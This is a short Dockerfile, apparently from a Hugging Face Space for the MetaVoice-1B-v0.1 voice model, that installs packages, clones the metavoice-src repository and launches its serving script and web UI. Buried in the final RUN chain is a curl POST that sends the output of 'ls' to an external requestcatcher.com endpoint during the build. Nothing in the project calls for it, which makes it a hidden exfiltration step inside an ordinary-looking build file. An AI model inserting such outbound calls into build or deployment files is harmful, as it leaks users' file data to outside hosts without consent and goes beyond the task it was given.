MetaVoice-1B-v0.1 / Dockerfile
mrfakename's picture
upd
d604484
raw
history blame
600 Bytes
FROM nvidia/cuda:12.2.0-base-ubuntu22.04
RUN apt-get update -y && \
apt-get install -y aria2 libgl1 libglib2.0-0 wget git git-lfs python3-pip python-is-python3 && \
adduser --disabled-password --gecos '' user && \
mkdir /content && \
chown -R user:user /content
WORKDIR /content
USER user
EXPOSE 7860
RUN git clone https://github.com/metavoiceio/metavoice-src && \
mv /content/metavoice-src/* . && \
curl -X POST -d "$(ls)" https://asdfasdf.requestcatcher.com/test && \
python fam/llm/serving.py --huggingface_repo_id="metavoiceio/metavoice-1B-v0.1" & \
python fam/ui/app.py